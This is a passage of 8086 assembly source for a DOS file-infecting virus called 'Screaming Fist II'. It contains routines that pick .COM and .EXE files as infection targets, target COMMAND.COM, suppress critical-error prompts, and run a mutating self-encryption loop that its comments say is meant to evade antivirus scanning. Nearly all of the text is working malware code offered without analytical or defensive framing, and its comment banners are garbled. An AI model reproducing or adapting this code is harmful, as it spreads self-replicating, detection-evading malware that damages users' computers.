POP DX ;To what was read in earlier
|
||
POP CX ;
|
||
CALL FUNCTION ;
|
||
JMP LEAVE_AND_CLOSE ;Leave
|
||
|
||
DONE:
|
||
MOV DX,OFFSET OLD_24_BX W ;Move the old INT 24's address
|
||
MOV DS,OFFSET OLD_24_ES W ;so we can restore it
|
||
MOV AX,2524H ;Restore it
|
||
CALL FUNCTION
|
||
POP ES ;Restore all registers
|
||
POP DS
|
||
POP DI
|
||
POP SI
|
||
POP DX
|
||
POP CX
|
||
POP BX
|
||
POP AX
|
||
RET ;And quit
|
||
|
||
RESTORE_ATTRIBS:
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
|
||
; This routine restores the files original attributes. ;
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
|
||
MOV AX,4301H ;Restore original attribs
|
||
MOV CX,[OLD_ATTRIBS] ;To what was read in earlier
|
||
MOV DS,OLD_DS
|
||
CALL FUNCTION
|
||
RET
|
||
|
||
NEW_24:
|
||
XOR AX,AX ;Any error will simply be ignored
|
||
STC ;Most useful for write protects
|
||
IRET
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
|
||
;Please don't be a lamer and change the text to claim it was your own creation ;
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
|
||
|
||
TEXT DB 'Screaming Fist II' ;For the AV people, can't have a dumb name!
|
||
COMMAND DB 'C:\COMMAND.COM',00 ;File infected
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
|
||
; This routine checks to see if the file at DS:DX has an extension of either ;
|
||
; .COM or .EXE. AX is set to zero if either condition is met, and non-zero ;
|
||
; If they aren't. ;
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
|
||
|
||
CHECK_NAME:
|
||
PUSH SI
|
||
MOV SI,DX
|
||
|
||
CHECK_FOR_PERIOD:
|
||
LODSB
|
||
OR AL,AL
|
||
JZ LEAVE_NAME_CHECK
|
||
CMP AL,'.'
|
||
JNZ CHECK_FOR_PERIOD
|
||
LODSB
|
||
AND AL,0DFH
|
||
CMP AL,'C'
|
||
JZ MAYBE_COM
|
||
CMP AL,'E'
|
||
JZ MAYBE_EXE
|
||
JMP SHORT LEAVE_NAME_CHECK
|
||
|
||
MAYBE_COM:
|
||
LODSW
|
||
AND AX,0DFDFH
|
||
CMP AX,'MO'
|
||
JZ FILE_GOOD
|
||
JMP SHORT LEAVE_NAME_CHECK
|
||
|
||
MAYBE_EXE:
|
||
LODSW
|
||
AND AX,0DFDFH
|
||
CMP AX,'EX'
|
||
JNZ LEAVE_NAME_CHECK
|
||
|
||
FILE_GOOD:
|
||
XOR AX,AX
|
||
|
||
LEAVE_NAME_CHECK:
|
||
POP SI
|
||
RET
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ͻ
|
||
;This is the encryption routine. This is the only portion that remains <20>
|
||
;unencrypted. The bytes mark by an ENC_SWITCH are changed to throw off SCAN <20>
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ͼ
|
||
|
||
ENC_START EQU $
|
||
|
||
DECRYPT_US:
|
||
POP BP
|
||
PUSH BP
|
||
|
||
ENC_SWITCH EQU $
|
||
MOV SI,BP ;Alternates between this and PUSH BP, POP SI
|
||
|
||
MOV AL,CS:[BP+ENC_BYTE-NEXT_PLACE] ;Get ENC key #1
|
||
MOV DL,CS:[BP+ENC_BYTE_2-NEXT_PLACE] ;Get ENC key #2
|
||
|
||
ENCRYPT_US:
|
||
MOV CX,ENC_LENGTH ;Length to encrypt or decrypt
|
||
|
||
ENCRYPT_US_II:
|
||
ENC_SWITCH_1 EQU $
|
||
NOT AL ;Alternates bewtween NOT and NEG
|
||
|
||
ENC_SWITCH_2 EQU $
|
||
XOR DL,AL ;Alternates between this and XOR AL,DL
|
||
|
||
ENC_SWITCH_4 EQU $
|
||
XOR BYTE PTR CS:[SI],AL ;Alternates bewteen AL and DL
|
||
SUB AL,DL
|
||
|
||
ENC_SWITCH_3 EQU $
|
||
NOT DL ;Alternates between NOT and NEG
|
||
|
||
ENC_SWITCH_5 EQU $
|
||
XOR BYTE PTR CS:[SI],DL ;Alternates between DL and AL
|
||
INC SI ;INC encryption pointer
|
||
ENC_SWITCH_6 EQU $
|
||
INC DL ;Alternates between INC and DEC
|
||
LOOP ENCRYPT_US_II
|
||
RET
|
||
|
||
ENC_BYTE DB 00 ;Storage space for encryption keys
|
||
ENC_BYTE_2 DB 00
|
||
|
||
FINI EQU $
|
||
|
||
LENGTH = FINI - CURTAIN_OPEN
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
|
||
;This is the data table and is not included in the virus size ;
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
|
||
DATA_BEGIN EQU $
|
||
|
||
OLD_ATTRIBS DW 00 00 ;File's old attributes
|
||
|
||
OLD_24_ES DW 00 00 ;Saves address of old INT 24
|
||
OLD_24_BX DW 00 00
|
||
|
||
OLD_DS DW 00 00 ;Saves DS and ES here on entering
|
||
OLD_ES DW 00 00
|
||
|
||
BUFFER_BEGIN EQU $
|
||
BUFFER EQU $
|
||
DB 1BH DUP(0) ;Buffer for bytes read in from file
|
||
BUFFER_END EQU $
|
||
|
||
DATA_END EQU $
|
||
|
||
DATA_LENGTH = DATA_END - DATA_BEGIN ;Length of Data Table
|
||
|
||
BUF_LENGTH = BUFFER_END - BUFFER_BEGIN ;Length of file buffer
|
||
|
||
ENC_LENGTH = ENC_START - OFFSET NEXT_PLACE
|